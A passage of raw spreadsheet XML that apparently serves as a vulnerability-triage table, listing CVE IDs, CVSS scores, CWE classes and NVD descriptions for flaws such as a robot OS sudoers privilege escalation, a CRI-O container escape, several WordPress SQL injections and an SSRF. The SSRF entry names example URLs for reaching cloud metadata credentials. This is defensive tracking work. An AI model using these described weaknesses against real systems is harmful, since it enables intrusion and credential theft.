      <c r="H208" s="5" t="inlineStr"/>
      <c r="I208" s="5" t="inlineStr"/>
      <c r="J208" s="5" t="inlineStr"/>
      <c r="K208" s="5" t="inlineStr"/>
      <c r="L208" s="5" t="inlineStr"/>
      <c r="M208" s="5" t="inlineStr"/>
      <c r="N208" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O208" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P208" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q208" s="5" t="inlineStr"/>
      <c r="R208" s="5" t="inlineStr">
        <is>
          <t>CWE-250, CWE-269</t>
        </is>
      </c>
      <c r="S208" s="5" t="inlineStr">
        <is>
          <t>Reachy Mini ISO for Wireless contains the necessary files to build a custom Raspberry Pi OS image for the Reachy Mini Wireless robot, using pi-gen. Prior to version 0.2.4, the Reachy Mini Wireless OS image shipped with an overly broad sudoers entry granting the pollen daemon user (uid 1000) passwordless sudo access to /usr/bin/systemctl with no subcommand or argument restriction. This is a local privilege escalation (LPE). Any process running as pollen can obtain full root (uid 0) on the device in three commands, with no additional vulnerability required and no user interaction. This issue has been patched in version 0.2.4.</t>
        </is>
      </c>
      <c r="T208" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53605</t>
        </is>
      </c>
    </row>
    <row r="209">
      <c r="A209" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B209" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C209" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62146</t>
        </is>
      </c>
      <c r="D209" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E209" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F209" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G209" s="5" t="inlineStr"/>
      <c r="H209" s="5" t="inlineStr"/>
      <c r="I209" s="5" t="inlineStr"/>
      <c r="J209" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K209" s="5" t="inlineStr"/>
      <c r="L209" s="5" t="inlineStr"/>
      <c r="M209" s="5" t="inlineStr"/>
      <c r="N209" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O209" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P209" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q209" s="5" t="inlineStr"/>
      <c r="R209" s="5" t="inlineStr">
        <is>
          <t>CWE-501</t>
        </is>
      </c>
      <c r="S209" s="5" t="inlineStr">
        <is>
          <t>A trust-boundary flaw in CRI-O's sandbox state persistence allows attacker-influenced pod metadata to overwrite CRI-O's own reserved sandbox bookkeeping; once reloaded as trusted after a restart, a later container recreate in that sandbox can expose a host-side runtime-management resource inside the container, enabling container escape.</t>
        </is>
      </c>
      <c r="T209" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62146</t>
        </is>
      </c>
    </row>
    <row r="210">
      <c r="A210" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B210" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C210" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100266</t>
        </is>
      </c>
      <c r="D210" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E210" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F210" s="5" t="inlineStr">
        <is>
          <t>cve@jetbrains.com</t>
        </is>
      </c>
      <c r="G210" s="5" t="inlineStr"/>
      <c r="H210" s="5" t="inlineStr"/>
      <c r="I210" s="5" t="inlineStr"/>
      <c r="J210" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K210" s="5" t="inlineStr"/>
      <c r="L210" s="5" t="inlineStr"/>
      <c r="M210" s="5" t="inlineStr"/>
      <c r="N210" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O210" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P210" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q210" s="5" t="inlineStr"/>
      <c r="R210" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S210" s="5" t="inlineStr">
        <is>
          <t>In JetBrains Hub before 2026.2.52366 missing authorisation allowed authenticated users to send arbitrary emails from the server's trusted address</t>
        </is>
      </c>
      <c r="T210" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100266</t>
        </is>
      </c>
    </row>
    <row r="211">
      <c r="A211" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B211" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C211" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100268</t>
        </is>
      </c>
      <c r="D211" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E211" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F211" s="5" t="inlineStr">
        <is>
          <t>cve@jetbrains.com</t>
        </is>
      </c>
      <c r="G211" s="5" t="inlineStr"/>
      <c r="H211" s="5" t="inlineStr"/>
      <c r="I211" s="5" t="inlineStr"/>
      <c r="J211" s="5" t="inlineStr"/>
      <c r="K211" s="5" t="inlineStr"/>
      <c r="L211" s="5" t="inlineStr"/>
      <c r="M211" s="5" t="inlineStr"/>
      <c r="N211" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O211" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P211" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q211" s="5" t="inlineStr"/>
      <c r="R211" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S211" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2026.2.19197 project administrators could read comments from other projects via notification templates</t>
        </is>
      </c>
      <c r="T211" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100268</t>
        </is>
      </c>
    </row>
    <row r="212">
      <c r="A212" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B212" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C212" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47576</t>
        </is>
      </c>
      <c r="D212" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E212" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F212" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G212" s="5" t="inlineStr"/>
      <c r="H212" s="5" t="inlineStr"/>
      <c r="I212" s="5" t="inlineStr"/>
      <c r="J212" s="5" t="inlineStr"/>
      <c r="K212" s="5" t="inlineStr"/>
      <c r="L212" s="5" t="inlineStr"/>
      <c r="M212" s="5" t="inlineStr"/>
      <c r="N212" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O212" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P212" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q212" s="5" t="inlineStr"/>
      <c r="R212" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S212" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel module through which an attacker might initiate an out-of-bounds read. Successful exploitation of this issue could lead to denial of service and information disclosure.</t>
        </is>
      </c>
      <c r="T212" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47576</t>
        </is>
      </c>
    </row>
    <row r="213">
      <c r="A213" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B213" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C213" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100262</t>
        </is>
      </c>
      <c r="D213" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E213" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F213" s="5" t="inlineStr">
        <is>
          <t>cve@jetbrains.com</t>
        </is>
      </c>
      <c r="G213" s="5" t="inlineStr"/>
      <c r="H213" s="5" t="inlineStr"/>
      <c r="I213" s="5" t="inlineStr"/>
      <c r="J213" s="5" t="inlineStr"/>
      <c r="K213" s="5" t="inlineStr"/>
      <c r="L213" s="5" t="inlineStr"/>
      <c r="M213" s="5" t="inlineStr"/>
      <c r="N213" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O213" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P213" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q213" s="5" t="inlineStr"/>
      <c r="R213" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S213" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2026.2.18991 missing authorisation allowed users with read-only project access to overwrite project notification templates</t>
        </is>
      </c>
      <c r="T213" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100262</t>
        </is>
      </c>
    </row>
    <row r="214">
      <c r="A214" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B214" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C214" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19553</t>
        </is>
      </c>
      <c r="D214" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E214" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F214" s="5" t="inlineStr">
        <is>
          <t>cna@python.org</t>
        </is>
      </c>
      <c r="G214" s="5" t="inlineStr"/>
      <c r="H214" s="5" t="inlineStr"/>
      <c r="I214" s="5" t="inlineStr"/>
      <c r="J214" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="K214" s="5" t="inlineStr"/>
      <c r="L214" s="5" t="inlineStr"/>
      <c r="M214" s="5" t="inlineStr"/>
      <c r="N214" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O214" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P214" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q214" s="5" t="inlineStr"/>
      <c r="R214" s="5" t="inlineStr">
        <is>
          <t>CWE-297</t>
        </is>
      </c>
      <c r="S214" s="5" t="inlineStr">
        <is>
          <t>ssl.SSLContext.wrap_bio() didn't require the server_hostname argument
to not be None if ssl.SSLContext.check_hostname was set. Due to a
missing parameter check in SSLObject, if the server_hostname argument
isn't supplied then hostname verification would be silently skipped.
This defect could lead to programs where certificate hostname verification
*appeared* to be succeeding with SSLContext.check_hostname = True and no
ValueError being raised due to misconfiguration.
If the program passes a server_hostname value that isn't an empty string
or None to any of these APIs then certificate hostname verification
proceeds as expected and the program is not affected by this vulnerability.
Mitigating this vulnerability doesn't require updating Python or applying
the patch. To mitigate, pass a valid non-None and non-empty
server_hostname value to SSLContext.wrap_bio(),
asyncio.create_connection(), or asyncio.loop.start_tls() and
certificate hostname verification will proceed as expected. Upgrading to
the latest version of Python or applying the patch only changes the
behavior from silently skipping hostname verification to raising a
ValueError, similar to SSLContext.wrap_socket(), when server_hostname
isn't supplied.</t>
        </is>
      </c>
      <c r="T214" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19553</t>
        </is>
      </c>
    </row>
    <row r="215">
      <c r="A215" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B215" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C215" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55177</t>
        </is>
      </c>
      <c r="D215" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E215" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F215" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G215" s="5" t="inlineStr"/>
      <c r="H215" s="5" t="inlineStr"/>
      <c r="I215" s="5" t="inlineStr"/>
      <c r="J215" s="5" t="inlineStr">
        <is>
          <t>tempo, requests</t>
        </is>
      </c>
      <c r="K215" s="5" t="inlineStr"/>
      <c r="L215" s="5" t="inlineStr"/>
      <c r="M215" s="5" t="inlineStr"/>
      <c r="N215" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O215" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P215" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q215" s="5" t="inlineStr"/>
      <c r="R215" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S215" s="5" t="inlineStr">
        <is>
          <t>CloudTAK is a browser-based Common Operating Picture and situational awareness tool compatible with TAK. Prior to version 13.10.0, every route in the ESRI helper family (api/routes/esri.ts) takes a fully attacker-controlled URL from the request (POST /api/esri body url, and the portal / server / layer query parameters on the GET /api/esri/* routes) and passes it into EsriBase / EsriProxyPortal / EsriProxyServer / EsriProxyLayer in api/lib/esri.ts, which fetch it with the bare fetch from @tak-ps/etl. No IP / DNS / hostname classification is applied at any point, so the destination is never validated against private, loopback, or link-local ranges. Any authenticated user (the routes only require Auth.is_auth(config, req, { anyResources: true }), i.e. any token, not an admin) can therefore make the CloudTAK server issue arbitrary outbound GET/POST requests to internal addresses such as the cloud instance-metadata service (169.254.169.254), loopback admin ports (127.0.0.1:&lt;port&gt;), and other hosts reachable only from inside the deployment VPC. This is a full-read SSRF, not blind: on success the upstream JSON body is returned to the caller via res.json(...), and on failure the upstream error string is reflected verbatim as ESRI Server Error: &lt;message&gt;. An attacker can read cloud metadata (and the temporary IAM credentials the instance role exposes), enumerate internal services, and exfiltrate their response bodies. The sniff() URL classifier provides no protection: it only pattern-matches the pathname (/rest, /arcgis/rest, /sharing/rest), so a URL like http://169.254.169.254/arcgis/rest or http://127.0.0.1:8500/rest passes sniff() and is fetched. This issue has been patched in version 13.10.0.</t>
        </is>
      </c>
      <c r="T215" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55177</t>
        </is>
      </c>
    </row>
    <row r="216">
      <c r="A216" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B216" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C216" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62085</t>
        </is>
      </c>
      <c r="D216" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E216" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F216" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G216" s="5" t="inlineStr"/>
      <c r="H216" s="5" t="inlineStr"/>
      <c r="I216" s="5" t="inlineStr"/>
      <c r="J216" s="5" t="inlineStr"/>
      <c r="K216" s="5" t="inlineStr"/>
      <c r="L216" s="5" t="inlineStr"/>
      <c r="M216" s="5" t="inlineStr"/>
      <c r="N216" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O216" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P216" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q216" s="5" t="inlineStr"/>
      <c r="R216" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S216" s="5" t="inlineStr">
        <is>
          <t>Administrator SQL Injection in WP Activity Log &lt;= 5.6.6 versions.</t>
        </is>
      </c>
      <c r="T216" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62085</t>
        </is>
      </c>
    </row>
    <row r="217">
      <c r="A217" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B217" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C217" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62097</t>
        </is>
      </c>
      <c r="D217" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E217" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F217" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G217" s="5" t="inlineStr"/>
      <c r="H217" s="5" t="inlineStr"/>
      <c r="I217" s="5" t="inlineStr"/>
      <c r="J217" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K217" s="5" t="inlineStr"/>
      <c r="L217" s="5" t="inlineStr"/>
      <c r="M217" s="5" t="inlineStr"/>
      <c r="N217" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O217" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P217" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q217" s="5" t="inlineStr"/>
      <c r="R217" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S217" s="5" t="inlineStr">
        <is>
          <t>Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in WPTasty Business Directory business-directory-plugin allows Blind SQL Injection.This issue affects Business Directory: from n/a through 6.4.27.</t>
        </is>
      </c>
      <c r="T217" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62097</t>
        </is>
      </c>
    </row>
    <row r="218">
      <c r="A218" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B218" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C218" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94082</t>
        </is>
      </c>
      <c r="D218" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E218" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F218" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G218" s="5" t="inlineStr"/>
      <c r="H218" s="5" t="inlineStr"/>
      <c r="I218" s="5" t="inlineStr"/>
      <c r="J218" s="5" t="inlineStr"/>
      <c r="K218" s="5" t="inlineStr"/>
      <c r="L218" s="5" t="inlineStr"/>
      <c r="M218" s="5" t="inlineStr"/>
      <c r="N218" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O218" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P218" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q218" s="5" t="inlineStr"/>
      <c r="R218" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S218" s="5" t="inlineStr">
        <is>
          <t>Author SQL Injection in Quiz Cat &lt;= 3.1.1 versions.</t>
        </is>
      </c>
      <c r="T218" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94082</t>
        </is>
      </c>
    </row>
    <row r="219">
      <c r="A219" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B219" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C219" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96345</t>
        </is>
      </c>
      <c r="D219" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E219" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F219" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G219" s="5" t="inlineStr"/>
      <c r="H219" s="5" t="inlineStr"/>
      <c r="I219" s="5" t="inlineStr"/>
      <c r="J219" s="5" t="inlineStr"/>
      <c r="K219" s="5" t="inlineStr"/>
      <c r="L219" s="5" t="inlineStr"/>
      <c r="M219" s="5" t="inlineStr"/>
      <c r="N219" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O219" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P219" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q219" s="5" t="inlineStr"/>
      <c r="R219" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S219" s="5" t="inlineStr">
        <is>
          <t>Administrator SQL Injection in Estatik &lt;= 4.3.5 versions.</t>
        </is>
      </c>
      <c r="T219" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96345</t>
        </is>
      </c>
    </row>
    <row r="220">
      <c r="A220" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B220" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C220" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96346</t>
        </is>
      </c>
      <c r="D220" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E220" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F220" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G220" s="5" t="inlineStr"/>
      <c r="H220" s="5" t="inlineStr"/>
      <c r="I220" s="5" t="inlineStr"/>
      <c r="J220" s="5" t="inlineStr"/>
      <c r="K220" s="5" t="inlineStr"/>
      <c r="L220" s="5" t="inlineStr"/>
      <c r="M220" s="5" t="inlineStr"/>
      <c r="N220" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O220" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P220" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q220" s="5" t="inlineStr"/>
      <c r="R220" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S220" s="5" t="inlineStr">
        <is>
          <t>Author SQL Injection in WP ERP &lt;= 1.17.9 versions.</t>
        </is>
      </c>
      <c r="T220" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96346</t>
        </is>
      </c>
    </row>
    <row r="221">
      <c r="A221" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B221" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C221" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96827</t>
        </is>
      </c>
      <c r="D221" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E221" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F221" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G221" s="5" t="inlineStr"/>
      <c r="H221" s="5" t="inlineStr"/>
      <c r="I221" s="5" t="inlineStr"/>
      <c r="J221" s="5" t="inlineStr"/>
      <c r="K221" s="5" t="inlineStr"/>
      <c r="L221" s="5" t="inlineStr"/>
      <c r="M221" s="5" t="inlineStr"/>
      <c r="N221" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O221" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P221" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q221" s="5" t="inlineStr"/>
      <c r="R221" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S221" s="5" t="inlineStr">
        <is>
          <t>Administrator SQL Injection in Admin Notices Manager &lt;= 1.6.0 versions.</t>
        </is>
      </c>
      <c r="T221" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96827</t>
        </is>
      </c>
    </row>
    <row r="222">
      <c r="A222" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B222" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C222" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96828</t>
        </is>
      </c>
      <c r="D222" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E222" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F222" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G222" s="5" t="inlineStr"/>
      <c r="H222" s="5" t="inlineStr"/>
      <c r="I222" s="5" t="inlineStr"/>
      <c r="J222" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K222" s="5" t="inlineStr"/>
      <c r="L222" s="5" t="inlineStr"/>
      <c r="M222" s="5" t="inlineStr"/>
      <c r="N222" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O222" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P222" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q222" s="5" t="inlineStr"/>
      <c r="R222" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S222" s="5" t="inlineStr">
        <is>
          <t>Administrator SQL Injection in Category Discount Woocommerce &lt;= 5.18 versions.</t>
        </is>
      </c>
      <c r="T222" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96828</t>
        </is>
      </c>
    </row>
    <row r="223">
      <c r="A223" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B223" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C223" s="5" t="inlineStr">
        <is>
          <t>CVE-2023-54402</t>
        </is>
      </c>
      <c r="D223" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E223" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F223" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G223" s="5" t="inlineStr"/>
      <c r="H223" s="5" t="inlineStr"/>
      <c r="I223" s="5" t="inlineStr"/>
      <c r="J223" s="5" t="inlineStr"/>
      <c r="K223" s="5" t="inlineStr"/>
      <c r="L223" s="5" t="inlineStr"/>
      <c r="M223" s="5" t="inlineStr"/>
      <c r="N223" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O223" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P223" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q223" s="5" t="inlineStr"/>
      <c r="R223" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S223" s="5" t="inlineStr">
        <is>
          <t>iDocView contains a server-side request forgery vulnerability in its /doc/upload endpoint that allows remote unauthenticated attackers to fetch arbitrary URLs by supplying a hardcoded default token value (testtoken) to bypass authentication. Attackers can exploit the unrestricted URL scheme handling, including file:// URIs, to read arbitrary local files such as operating-system and application configuration files, and to reach internal network hosts and services not otherwise accessible. Exploitation evidence was first observed by the Shadowserver Foundation on 2024-03-26.</t>
        </is>
      </c>
      <c r="T223" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2023-54402</t>
        </is>
      </c>
    </row>
    <row r="224">
      <c r="A224" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B224" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C224" s="5" t="inlineStr">
        <is>
          <t>CVE-2023-54403</t>
        </is>
      </c>
      <c r="D224" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E224" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F224" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G224" s="5" t="inlineStr"/>
      <c r="H224" s="5" t="inlineStr"/>
      <c r="I224" s="5" t="inlineStr"/>
      <c r="J224" s="5" t="inlineStr">
        <is>
